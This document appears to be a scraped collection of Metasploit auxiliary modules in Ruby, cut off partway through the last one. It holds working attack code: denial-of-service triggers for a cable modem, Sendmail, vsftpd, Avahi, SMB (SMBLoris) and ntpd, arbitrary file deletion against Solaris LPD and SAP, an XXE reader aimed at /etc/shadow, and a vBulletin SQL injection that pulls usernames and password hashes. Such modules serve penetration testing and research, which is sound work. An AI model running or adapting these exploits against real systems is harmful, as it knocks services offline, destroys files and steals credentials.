<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />require 'eventmachine'<br />require 'faye/websocket'<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpClient<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => '"Cablehaunt" Cable Modem WebSocket DoS',<br /> 'Description' => %q{<br /> There exists a buffer overflow vulnerability in certain<br /> Cable Modem Spectrum Analyzer interfaces. This overflow<br /> is exploitable, but since an exploit would differ between<br /> every make, model, and firmware version (which also<br /> differs from ISP to ISP), this module simply causes a<br /> Denial of Service to test if the vulnerability is present.<br /> },<br /> 'Author' => [<br /> 'Alexander Dalsgaard Krog (Lyrebirds)', # Original research, discovery, and PoC<br /> 'Jens Hegner Stærmose (Lyrebirds)', # Original research, discovery, and PoC<br /> 'Kasper Kohsel Terndrup (Lyrebirds)', # Original research, discovery, and PoC<br /> 'Simon Vandel Sillesen (Independent)', # Original research, discovery, and PoC<br /> 'Nicholas Starke' # msf module<br /> ],<br /> 'References' => [<br /> ['CVE', '2019-19494'],<br /> ['EDB', '47936'],<br /> ['URL', 'https://cablehaunt.com/'],<br /> ['URL', 'https://github.com/Lyrebirds/sagemcom-fast-3890-exploit']<br /> ],<br /> 'DisclosureDate' => '2020-01-07',<br /> 'License' => MSF_LICENSE,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SERVICE_DOWN],<br /> 'SideEffects' => [IOC_IN_LOGS],<br /> 'Reliability' => []<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> Opt::RHOST('192.168.100.1'),<br /> Opt::RPORT(8080),<br /> OptString.new('WS_USERNAME', [true, 'WebSocket connection basic auth username', 'admin']),<br /> OptString.new('WS_PASSWORD', [true, 'WebSocket connection basic auth password', 'password']),<br /> OptInt.new('TIMEOUT', [true, 'Time to wait for response', 15])<br /> ]<br /> )<br /><br /> deregister_options('Proxies')<br /> deregister_options('VHOST')<br /> deregister_options('SSL')<br /> end<br /><br /> def run<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => '/',<br /> 'authorization' => basic_auth(datastore['WS_USERNAME'], datastore['WS_PASSWORD'])<br /> })<br /><br /> fail_with(Failure::Unreachable, 'Cannot Connect to Cable Modem Spectrum Analyzer Web Service') if res.nil?<br /> fail_with(Failure::Unknown, 'Credentials were incorrect') if res.code != 200<br /><br /> @succeeded = false<br /> EM.run do<br /> print_status("Attempting Connection to #{datastore['RHOST']}")<br /><br /> driver = Faye::WebSocket::Client.new("ws://#{datastore['RHOST']}:#{datastore['RPORT']}/Frontend", ['rpc-frontend'])<br /><br /> driver.on :open do<br /> print_status('Opened connection')<br /><br /> EM::Timer.new(1) do<br /> print_status('Sending payload')<br /> payload = Rex::Text.rand_text_alphanumeric(7000..8000)<br /> driver.send({<br /> jsonrpc: '2.0',<br /> method: 'Frontend::GetFrontendSpectrumData',<br /> params: {<br /> coreID: 0,<br /> fStartHz: payload,<br /> fStopHz: 1000000000,<br /> fftSize: 1024,<br /> gain: 1<br /> },<br /> id: '0'<br /> }.to_json)<br /> rescue StandardError<br /> fail_with(Failure::Unreachable, 'Could not establish websocket connection')<br /> end<br /> end<br /><br /> EM::Timer.new(10) do<br /> print_status('Checking Modem Status')<br /> begin<br /> res = send_request_cgi({<br /> 'method' => 'GET',<br /> 'uri' => '/'<br /> })<br /><br /> if res.nil?<br /> @succeeded = true<br /> print_status('Cable Modem unreachable')<br /> else<br /> fail_with(Failure::Unknown, 'Host still reachable')<br /> end<br /> rescue StandardError<br /> @succeeded = true<br /> print_status('Cable Modem unreachable')<br /> end<br /> end<br /><br /> EM::Timer.new(datastore['TIMEOUT']) do<br /> EventMachine.stop<br /> if @succeeded<br /> print_good('Exploit delivered and cable modem unreachable.')<br /> else<br /> fail_with(Failure::Unknown, 'Unknown failure occurred')<br /> end<br /> end<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::Smtp<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Sendmail SMTP Address prescan Memory Corruption',<br /> 'Description' => %q{<br /> This is a proof of concept denial of service module for Sendmail versions<br /> 8.12.8 and earlier. The vulnerability is within the prescan() method when<br /> parsing SMTP headers. Due to the prescan function, only 0x5c and 0x00<br /> bytes can be used, limiting the likelihood for arbitrary code execution.<br /> },<br /> 'Author' => [ 'aushack' ],<br /> 'References' =><br /> [<br /> [ 'OSVDB', '2577' ],<br /> [ 'CVE', '2003-0694' ],<br /> [ 'BID', '8641' ],<br /> [ 'EDB', '24' ]<br /> ],<br /> 'DisclosureDate' => '2003-09-17'))<br /> end<br /><br /> def run<br /> begin<br /> connect<br /> # we use connect instead of connect_login,<br /> # because we send our own malicious RCPT.<br /> # however we want to make use of MAILFROM<br /> # and raw_send_recv()<br /> #select(nil,nil,nil,23) # so we can attach gdb to the child PID<br /><br /> sploit = ("A" * 255 + ";") * 4 + "A" * 217 + ";" + "\x5c\xff" * 28<br /><br /> raw_send_recv("EHLO X\r\n")<br /> raw_send_recv("MAIL FROM: #{datastore['MAILFROM']}\r\n")<br /> print_status("Sending DoS packet.")<br /> raw_send_recv("RCPT TO: #{sploit}\r\n")<br /><br /> disconnect<br /> rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout<br /> print_status("Couldn't connect to #{rhost}:#{rport}")<br /> rescue ::EOFError<br /> print_status("Sendmail stopped responding after sending trigger - target vulnerable.")<br /> end<br /><br /> end<br />end<br /><br />=begin<br />Program received signal SIGSEGV, Segmentation fault.<br />0x8073499 in ?? ()<br />(gdb) bt<br />#0 0x807e499 in ?? ()<br />#1 0x087e125 in ?? ()<br />#2 0x5c5c5c5c in ?? ()<br />Error accessing memory address 0x5c5c5c5c: Bad address.<br />=end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::Ftp<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'VSFTPD 2.3.2 Denial of Service',<br /> 'Description' => %q{<br /> This module triggers a Denial of Service condition in the VSFTPD server in<br /> versions before 2.3.3. So far, it has been tested on 2.3.0, 2.3.1, and 2.3.2.<br /> },<br /> 'Author' => [<br /> 'Nick Cottrell (Rad10Logic) <ncottrellweb[at]gmail.com>', # Module Creator<br /> 'Anna Graterol <annagraterol95[at]gmail.com>', # Vuln researcher<br /> 'Mana Mostaani <mana.mostaani[at]gmail.com>',<br /> 'Maksymilian Arciemowicz' # Original EDB PoC<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> [ 'BID', '46617' ],<br /> [ 'CVE', '2011-0762' ],<br /> [ 'EDB', '16270' ]<br /> ],<br /> 'DisclosureDate' => '2011-02-03',<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SERVICE_DOWN],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => []<br /> }<br /> )<br /> )<br /> end<br /><br /> def check<br /> # attempt to connect<br /> begin<br /> if !connect_login<br /> print_error('Connection refused.')<br /> return Exploit::CheckCode::Unknown<br /> end<br /> rescue Rex::ConnectionRefused<br /> print_error('Connection refused.')<br /> return Exploit::CheckCode::Unknown<br /> rescue Rex::ConnectionTimeout<br /> print_error('Connection timed out')<br /> return Exploit::CheckCode::Unknown<br /> end<br /> s = ''<br /> loop do<br /> # get each line until our desired line shows or end line shows<br /> s = send_cmd(['STAT'], true)<br /> break if (s =~ /vsFTPd \d+\.\d+\.\d+/) || (s == "211 End of status\r\n")<br /> end<br /> disconnect<br /> # check if version was found<br /> if s !~ /vsFTPd \d+\.\d+\.\d+/<br /> print_error('Did not find ftp version in FTP session.')<br /> return Exploit::CheckCode::Unknown<br /> end<br /><br /> # pull out version and check if its in range of vulnerability<br /> version = s[/\d+\.\d+\.\d+/]<br /> if Rex::Version.new(version) < Rex::Version.new('2.3.3')<br /> Exploit::CheckCode::Appears<br /> else<br /> Exploit::CheckCode::Safe<br /> end<br /> end<br /><br /> def run<br /> fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') if check != Exploit::CheckCode::Appears<br /><br /> payload = 'STAT ' + '{{*},' * 487 + '{.}' + '}' * 487<br /><br /> vprint_status("Payload being sent: #{payload}")<br /> print_status('sending payload')<br /><br /> loop do<br /> print('.')<br /> connect_login<br /> 10.times do<br /> send_cmd([payload.to_s], false)<br /> end<br /> send_cmd([payload.to_s], true)<br /> disconnect<br /> rescue Rex::ConnectionTimeout<br /> print("\n")<br /> print_error('Connection timeout! Sending again')<br /> rescue Errno::ECONNRESET<br /> print("\n")<br /> print_error('Connection reset!')<br /> rescue Rex::ConnectionRefused<br /> print("\n")<br /> print_good('Connection refused! Appears DOS attack succeeded.')<br /> rescue EOFError<br /> print("\n")<br /> print_good('Stream was cut off abruptly. Appears DOS attack succeeded.')<br /> break<br /> end<br /> disconnect<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::Tcp<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'Solaris LPD Arbitrary File Delete',<br /> 'Description' => %q{<br /> This module uses a vulnerability in the Solaris line printer<br /> daemon to delete arbitrary files on an affected system. This<br /> can be used to exploit the rpc.walld format string flaw, the<br /> missing krb5.conf authentication bypass, or simply delete<br /> system files. Tested on Solaris 2.6, 7, 8, 9, and 10.<br /><br /> },<br /> 'Author' => [ 'hdm', 'Optyx <optyx[at]uberhax0r.net>' ],<br /> 'License' => MSF_LICENSE,<br /> 'References' =><br /> [<br /> [ 'CVE', '2005-4797' ],<br /> [ 'BID', '14510' ],<br /> [ 'OSVDB', '18650' ]<br /> ]<br /> ))<br /><br /> register_options(<br /> [<br /> Opt::RPORT(515),<br /> OptString.new('RPATH', [ true, "The remote file path to delete"]),<br /> ])<br /> end<br /><br /> def run<br /><br /><br /> r_hostname = Rex::Text.rand_text_alpha(rand(8)+1)<br /> r_user = Rex::Text.rand_text_alpha(rand(8)+1)<br /> r_spool = Rex::Text.rand_text_alpha(rand(8)+1)<br /><br /> # Create a simple control file...<br /> control = "H#{r_hostname}\nP#{r_user}\n";<br /><br /> # The job ID is squashed down to three decimal digits<br /> jid = ($$ % 1000).to_s + [Time.now.to_i].pack('N').unpack('H*')[0]<br /><br /> # Establish the first connection to the server<br /> sock1 = connect(false)<br /><br /> # Request a cascaded job<br /> sock1.put("\x02#{r_hostname}:#{r_spool}\n")<br /> res = sock1.get_once<br /> if (not res)<br /> print_status("The target did not accept our job request command")<br /> return<br /> end<br /><br /> # Theoretically, we could delete multiple files at once, however<br /> # the lp daemon will append garbage from memory to the path name<br /> # if we don't stick a null byte after the path. Unfortunately, this<br /> # null byte will prevent the parser from processing the other paths.<br /> control << "U" + ("../" * 10) + "#{datastore['RPATH']}\x00\n"<br /><br /> dataf = Rex::Text.rand_text_alpha(100)+1<br /><br /> print_status("Deleting #{datastore['RPATH']}...")<br /> if !(<br /> send_file(sock1, 2, "cfA" + jid + r_hostname, control) and<br /> send_file(sock1, 3, "dfa" + jid + r_hostname, dataf)<br /> )<br /> sock1.close<br /> return<br /> end<br /><br /> print_good("Successfully deleted #{datastore['RPATH']} >:-]")<br /> sock1.close<br /> end<br /><br /> def send_file(s, type, name, data='')<br /><br /> s.put(type.chr + data.length.to_s + " " + name + "\n")<br /> res = s.get_once(1)<br /> if !(res and res[0] == ?\0)<br /> print_status("The target did not accept our control file command (#{name})")<br /> return<br /> end<br /><br /> s.put(data)<br /> s.put("\x00")<br /> res = s.get_once(1)<br /> if !(res and res[0] == ?\0)<br /> print_status("The target did not accept our control file data (#{name})")<br /> return<br /> end<br /><br /> print_status(sprintf(" Uploaded %.4d bytes >> #{name}", data.length))<br /> return true<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />##<br /># This module is based on, inspired by, or is a port of a plugin available in<br /># the Onapsis Bizploit Opensource ERP Penetration Testing framework -<br /># http://www.onapsis.com/research-free-solutions.php.<br /># Mariano Nunez (the author of the Bizploit framework) helped me in my efforts<br /># in producing the Metasploit modules and was happy to share his knowledge and<br /># experience - a very cool guy.<br />#<br /># The following guys from ERP-SCAN deserve credit for their contributions -<br /># Alexandr Polyakov, Alexey Sintsov, Alexey Tyurin, Dmitry Chastukhin and<br /># Dmitry Evdokimov.<br />#<br /># I'd also like to thank Chris John Riley, Ian de Villiers and Joris van de Vis<br /># who have Beta tested the modules and provided excellent feedback. Some people<br /># just seem to enjoy hacking SAP :)<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Auxiliary::Report<br /> include Msf::Auxiliary::Scanner<br /><br /> def initialize<br /> super(<br /> 'Name' => 'SAP SOAP EPS_DELETE_FILE File Deletion',<br /> 'Description' => %q{<br /> This module abuses the SAP NetWeaver EPS_DELETE_FILE function, on the SAP SOAP<br /> RFC Service, to delete arbitrary files on the remote file system. The module can<br /> also be used to capture SMB hashes by using a fake SMB share as DIRNAME.<br /> },<br /> 'References' => [<br /> [ 'OSVDB', '74780' ],<br /> [ 'URL', 'http://dsecrg.com/pages/vul/show.php?id=331' ],<br /> [ 'URL', 'https://launchpad.support.sap.com/#/notes/1554030' ]<br /> ],<br /> 'Author' =><br /> [<br /> 'Alexey Sintsov', # Vulnerability discovery<br /> 'nmonkee' # Metasploit module<br /> ],<br /> 'License' => MSF_LICENSE<br /> )<br /><br /> register_options([<br /> Opt::RPORT(8000),<br /> OptString.new('CLIENT', [true, 'SAP Client', '001']),<br /> OptString.new('HttpUsername', [true, 'Username', 'SAP*']),<br /> OptString.new('HttpPassword', [true, 'Password', '06071992']),<br /> OptString.new('DIRNAME', [true, 'Directory Path which contains the file to delete', '/tmp']),<br /> OptString.new('FILENAME', [true, 'Filename to delete', 'msf.txt'])<br /> ])<br /> end<br /><br /> def run_host(ip)<br /> data = '<?xml version="1.0" encoding="utf-8" ?>'<br /> data << '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="http://schemas.xmlsoap.org/wsdl/soap/" '<br /> data << 'xmlns:xsd="http://www.w3.org/1999/XMLSchema" xmlns:xsi="http://www.w3.org/1999/XMLSchema-instance" xmlns:m0="http://tempuri.org/" '<br /> data << 'xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/">'<br /> data << '<SOAP-ENV:Header/>'<br /> data << '<SOAP-ENV:Body>'<br /> data << '<EPS_DELETE_FILE xmlns="urn:sap-com:document:sap:rfc:functions">'<br /> data << '<DIR_NAME>' + datastore['DIRNAME'] + '</DIR_NAME>'<br /> data << '<FILE_NAME>' + datastore['FILENAME'] + '</FILE_NAME>'<br /> data << '<IV_LONG_DIR_NAME></IV_LONG_DIR_NAME>'<br /> data << '<IV_LONG_FILE_NAME></IV_LONG_FILE_NAME>'<br /> data << '</EPS_DELETE_FILE>'<br /> data << '</SOAP-ENV:Body>'<br /> data << '</SOAP-ENV:Envelope>'<br /><br /> begin<br /> vprint_status("#{rhost}:#{rport} - Sending request to delete #{datastore['FILENAME']} at #{datastore['DIRNAME']}")<br /> res = send_request_cgi({<br /> 'uri' => '/sap/bc/soap/rfc',<br /> 'method' => 'POST',<br /> 'data' => data,<br /> 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),<br /> 'cookie' => 'sap-usercontext=sap-language=EN&sap-client=' + datastore['CLIENT'],<br /> 'ctype' => 'text/xml; charset=UTF-8',<br /> 'headers' => {<br /> 'SOAPAction' => 'urn:sap-com:document:sap:rfc:functions',<br /> },<br /> 'vars_get' => {<br /> 'sap-client' => datastore['CLIENT'],<br /> 'sap-language' => 'EN'<br /> }<br /> })<br /><br /> if res and res.code == 200 and res.body =~ /EPS_DELETE_FILE.Response/ and res.body.include?(datastore['FILENAME']) and res.body.include?(datastore['DIRNAME'])<br /> print_good("#{rhost}:#{rport} - File #{datastore['FILENAME']} at #{datastore['DIRNAME']} successfully deleted")<br /> elsif res<br /> vprint_error("#{rhost}:#{rport} - Response code: " + res.code.to_s)<br /> vprint_error("#{rhost}:#{rport} - Response message: " + res.message.to_s)<br /> vprint_error("#{rhost}:#{rport} - Response body: " + res.body.to_s) if res.body<br /> end<br /> rescue ::Rex::ConnectionError<br /> print_error("#{rhost}:#{rport} - Unable to connect")<br /> return<br /> end<br /> end<br /> end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Capture<br /> include Msf::Auxiliary::Dos<br /><br /> def initialize<br /> super(<br /> 'Name' => 'Avahi Source Port 0 DoS',<br /> 'Description' => %q{<br /> Avahi-daemon versions prior to 0.6.24 can be DoS'd<br /> with an mDNS packet with a source port of 0.<br /> },<br /> 'Author' => 'kris katterjohn',<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> [ 'CVE', '2008-5081' ],<br /> [ 'OSVDB', '50929' ],<br /> ],<br /> 'DisclosureDate' => 'Nov 14 2008')<br /><br /> register_options([<br /> OptInt.new('RPORT', [true, 'The destination port', 5353])<br /> ])<br /><br /> deregister_options('FILTER','PCAPFILE')<br /> end<br /><br /> def run<br /> open_pcap<br /><br /> print_status("Sending to #{rhost}")<br /><br /> p = PacketFu::UDPPacket.new<br /> p.ip_saddr = "0.0.0.0"<br /> p.ip_daddr = rhost<br /> p.ip_frag = 0x4000 # Original had ip frag flags set to 2 for some reason.<br /> p.udp_sport = 0 # That's the bug<br /> p.udp_dport = datastore['RPORT'].to_i<br /> p.payload = Rex::Text.rand_text(rand(0x20)) # UDP needs at least one data byte, may as well send a few.<br /> p.recalc<br /> capture_sendto(p, rhost) and print_status("Avahi should be down now")<br /> close_pcap<br /> end<br />end<br /></code></pre>
<pre><code>#!/usr/bin/env ruby<br /><br />require 'socket'<br />require 'metasploit'<br /><br />require 'bindata'<br /><br />class NbssHeader < BinData::Record<br /> endian :little<br /> uint8 :message_type<br /> bit7 :flags<br /> bit17 :message_length<br />end<br /><br />metadata = {<br /> name: 'SMBLoris NBSS Denial of Service',<br /> description: %q{<br /> The SMBLoris attack consumes large chunks of memory in the target by sending<br /> SMB requests with the NetBios Session Service(NBSS) Length Header value set<br /> to the maximum possible value. By keeping these connections open and initiating<br /> large numbers of these sessions, the memory does not get freed, and the server<br /> grinds to a halt. This vulnerability was originally disclosed by Sean Dillon<br /> and Zach Harding.<br /><br /> DISCALIMER: This module opens a lot of simultaneous connections. Please check<br /> your system's ULIMIT to make sure it can handle it. This module will also run<br /> continuously until stopped.<br /> },<br /> authors: [<br /> 'thelightcosine',<br /> 'Adam Cammack <adam_cammack[at]rapid7.com>'<br /> ],<br /> date: '2017-06-29',<br /> references: [<br /> { type: 'url', ref: 'https://web.archive.org/web/20170804072329/https://smbloris.com/' },<br /> { type: 'aka', ref: 'SMBLoris'}<br /> ],<br /> type: 'dos',<br /> options: {<br /> rhost: {type: 'address', description: 'The target address', required: true, default: nil},<br /> rport: {type: 'port', description: 'SMB port on the target', required: true, default: 445},<br /> }<br />}<br /><br />def run(args)<br /> header = NbssHeader.new<br /> header.message_length = 0x01FFFF<br /><br /> last_reported = 0<br /> warned = false<br /> n_loops = 0<br /> sockets = []<br /><br /> target = Addrinfo.tcp(args[:rhost], args[:rport].to_i)<br /><br /> Metasploit.logging_prefix = "#{target.inspect_sockaddr} - "<br /><br /> while true do<br /> begin<br /> sockets.delete_if do |s|<br /> s.closed?<br /> end<br /><br /> nsock = target.connect(timeout: 360)<br /> nsock.setsockopt(Socket::SOL_SOCKET, Socket::SO_KEEPALIVE, true)<br /> nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPCNT, 5))<br /> nsock.setsockopt(Socket::Option.int(:INET, :TCP, :KEEPINTVL, 10))<br /> nsock.setsockopt(Socket::Option.linger(true, 60))<br /> nsock.write(header.to_binary_s)<br /> sockets << nsock<br /><br /> n_loops += 1<br /> if last_reported != sockets.length<br /> if n_loops % 100 == 0<br /> last_reported = sockets.length<br /> Metasploit.log "#{sockets.length} socket(s) open", level: 'info'<br /> end<br /> elsif n_loops % 1000 == 0<br /> Metasploit.log "Holding steady at #{sockets.length} socket(s) open", level: 'info'<br /> end<br /> rescue Interrupt<br /> break<br /> sockets.each &:close<br /> rescue Errno::EMFILE<br /> Metasploit.log "At open socket limit with #{sockets.length} sockets open. Try increasing your system limits.", level: 'warning' unless warned<br /> warned = true<br /> sockets.slice(0).close<br /> rescue Exception => e<br /> Metasploit.log "Exception sending packet: #{e.message}", level: 'error'<br /> end<br /> end<br />end<br /><br />if __FILE__ == $PROGRAM_NAME<br /> Metasploit.run(metadata, method(:run))<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Capture<br /> include Msf::Auxiliary::Scanner<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'NTP.org ntpd Reserved Mode Denial of Service',<br /> 'Description' => %q{<br /> This module exploits a denial of service vulnerability<br /> within the NTP (network time protocol) demon. By sending<br /> a single packet to a vulnerable ntpd server (Victim A),<br /> spoofed from the IP address of another vulnerable ntpd server<br /> (Victim B), both victims will enter an infinite response loop.<br /> Note, unless you control the spoofed source host or the real<br /> remote host(s), you will not be able to halt the DoS condition<br /> once begun!<br /> },<br /> 'Author' => [ 'todb' ],<br /> 'License' => MSF_LICENSE,<br /> 'References' =><br /> [<br /> [ 'BID', '37255' ],<br /> [ 'CVE', '2009-3563' ],<br /> [ 'OSVDB', '60847' ],<br /> [ 'URL', 'https://bugs.ntp.org/show_bug.cgi?id=1331' ]<br /> ],<br /> 'DisclosureDate' => '2009-10-04'))<br /><br /> register_options(<br /> [<br /> OptAddressLocal.new('LHOST', [true, "The spoofed address of a vulnerable ntpd server" ])<br /> ])<br /> deregister_options('FILTER','PCAPFILE')<br /><br /> end<br /><br /> def run_host(ip)<br /> open_pcap<br /><br /> print_status("Sending a mode 7 packet to host #{ip} from #{datastore['LHOST']}")<br /><br /> p = PacketFu::UDPPacket.new<br /> p.ip_saddr = datastore['LHOST']<br /> p.ip_daddr = ip<br /> p.ip_ttl = 255<br /> p.udp_src = 123<br /> p.udp_dst = 123<br /> p.payload = ["\x17", "\x97\x00\x00\x00"][rand(2)]<br /> p.recalc<br /> capture_sendto(p,ip)<br /><br /> close_pcap<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Exploit::Remote::HttpClient<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read',<br /> 'Description' => %q{<br /> EMC CTA v10.0 is susceptible to an unauthenticated XXE attack<br /> that allows an attacker to read arbitrary files from the file system<br /> with the permissions of the root user.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' =><br /> [<br /> 'Brandon Perry <bperry.volatile[at]gmail.com>', #metasploit module<br /> ],<br /> 'References' =><br /> [<br /> ['CVE', '2014-0644'],<br /> ['EDB', '32623']<br /> ],<br /> 'DisclosureDate' => '2014-03-31'<br /> ))<br /><br /> register_options(<br /> [<br /> Opt::RPORT(443),<br /> OptBool.new('SSL', [true, 'Use SSL', true]),<br /> OptString.new('TARGETURI', [ true, "Base directory path", '/']),<br /> OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/shadow"]),<br /> ]<br /> )<br /> end<br /><br /> def run<br /><br /> doctype = Rex::Text.rand_text_alpha(6)<br /> element = Rex::Text.rand_text_alpha(6)<br /> entity = Rex::Text.rand_text_alpha(6)<br /><br /> pay = %Q{<?xml version="1.0" encoding="ISO-8859-1"?><br /><!DOCTYPE #{doctype} [<br /><!ELEMENT #{element} ANY ><br /><!ENTITY #{entity} SYSTEM "file://#{datastore['FILEPATH']}" >]><br /><Request><br /><Username>root</Username><br /><Password>&#{entity};</Password><br /></Request><br /> }<br /><br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, 'api', 'login'),<br /> 'method' => 'POST',<br /> 'data' => pay<br /> })<br /><br /> if !res or !res.body<br /> fail_with(Failure::UnexpectedReply, "Server did not respond in an expected way")<br /> end<br /><br /> file = /For input string: "(.*)"/m.match(res.body)<br /><br /> if !file or file.length < 2<br /> fail_with(Failure::UnexpectedReply, "File was unretrievable. Was it a binary file?")<br /> end<br /><br /> file = file[1]<br /><br /> path = store_loot('emc.file', 'text/plain', datastore['RHOST'], file, datastore['FILEPATH'])<br /><br /> print_good("File saved to: " + path)<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Auxiliary<br /> include Msf::Auxiliary::Report<br /> include Msf::Exploit::Remote::HttpClient<br /><br /> def initialize(info = {})<br /> super(update_info(info,<br /> 'Name' => 'vBulletin Password Collector via nodeid SQL Injection',<br /> 'Description' => %q{<br /> This module exploits a SQL injection vulnerability found in vBulletin 5 that has been<br /> used in the wild since March 2013. This module can be used to extract the web application's<br /> usernames and hashes, which could be used to authenticate into the vBulletin admin control<br /> panel.<br /> },<br /> 'References' =><br /> [<br /> [ 'CVE', '2013-3522' ],<br /> [ 'OSVDB', '92031' ],<br /> [ 'EDB', '24882' ],<br /> [ 'BID', '58754' ],<br /> [ 'URL', 'http://www.zempirians.com/archive/legion/vbulletin_5.pl.txt' ]<br /> ],<br /> 'Author' =><br /> [<br /> 'Orestis Kourides', # Vulnerability discovery and PoC<br /> 'sinn3r', # Metasploit module<br /> 'juan vazquez' # Metasploit module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'DisclosureDate' => '2013-03-24'<br /> ))<br /><br /> register_options(<br /> [<br /> OptString.new("TARGETURI", [true, 'The path to vBulletin', '/']),<br /> OptInt.new("NODE", [false, 'Valid Node ID']),<br /> OptInt.new("MINNODE", [true, 'Valid Node ID', 1]),<br /> OptInt.new("MAXNODE", [true, 'Valid Node ID', 100])<br /> ])<br /> end<br /><br /> def exists_node?(id)<br /> mark = Rex::Text.rand_text_alpha(8 + rand(5))<br /> result = do_sqli(id, "select '#{mark}'")<br /><br /> if result and result =~ /#{mark}/<br /> return true<br /> end<br /><br /> return false<br /> end<br /><br /> def brute_force_node<br /> min = datastore["MINNODE"]<br /> max = datastore["MAXNODE"]<br /><br /> if min > max<br /> print_error("MINNODE can't be major than MAXNODE")<br /> return nil<br /> end<br /><br /> for node_id in min..max<br /> if exists_node?(node_id)<br /> return node_id<br /> end<br /> end<br /><br /> return nil<br /> end<br /><br /> def get_node<br /> if datastore['NODE'].nil? or datastore['NODE'] <= 0<br /> print_status("Brute forcing to find a valid node id...")<br /> return brute_force_node<br /> end<br /><br /> print_status("Checking node id #{datastore['NODE']}...")<br /> if exists_node?(datastore['NODE'])<br /> return datastore['NODE']<br /> else<br /> return nil<br /> end<br /> end<br /><br /> # session maybe isn't needed, unauthenticated<br /> def do_sqli(node, query)<br /> mark = Rex::Text.rand_text_alpha(5 + rand(3))<br /> random_and = Rex::Text.rand_text_numeric(4)<br /> injection = ") and(select 1 from(select count(*),concat((select (select concat('#{mark}',cast((#{query}) as char),'#{mark}')) "<br /> injection << "from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) "<br /> injection << "AND (#{random_and}=#{random_and}"<br /><br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, "index.php", "ajax", "api", "reputation", "vote"),<br /> 'vars_post' =><br /> {<br /> 'nodeid' => "#{node}#{injection}",<br /> }<br /> })<br /><br /> unless res and res.code == 200 and res.body.to_s =~ /Database error in vBulletin/<br /> return nil<br /> end<br /><br /> data = ""<br /><br /> if res.body.to_s =~ /#{mark}(.*)#{mark}/<br /> data = $1<br /> end<br /><br /> return data<br /> end<br /><br /> def get_user_data(node_id, user_id)<br /> user = do_sqli(node_id, "select username from user limit #{user_id},#{user_id+1}")<br /> pass = do_sqli(node_id, "select password from user limit #{user_id},#{user_id+1}")<br /> salt = do_sqli(node_id, "select salt from user limit #{user_id},#{user_id+1}")<br /><br /> return [user, pass, salt]<br /> end<br /><br /> def check<br /> res = send_request_cgi({<br /> 'uri' => normalize_uri(target_uri.path, "index.php")<br /> })<br /><br /> if res and res.code == 200 and res.body.to_s =~ /"simpleversion": "v=5/<br /> if get_node<br /> # Multiple factors determine this LOOKS vulnerable<br /> return Msf::Exploit::CheckCode::Appears<br /> else<br /> # Not enough information about the vuln state, but at least we know this is vbulletin<br /> return Msf::Exploit::CheckCode::Detected<br /> end<br /> end<br /><br /> Msf::Exploit::CheckCode::Safe<br 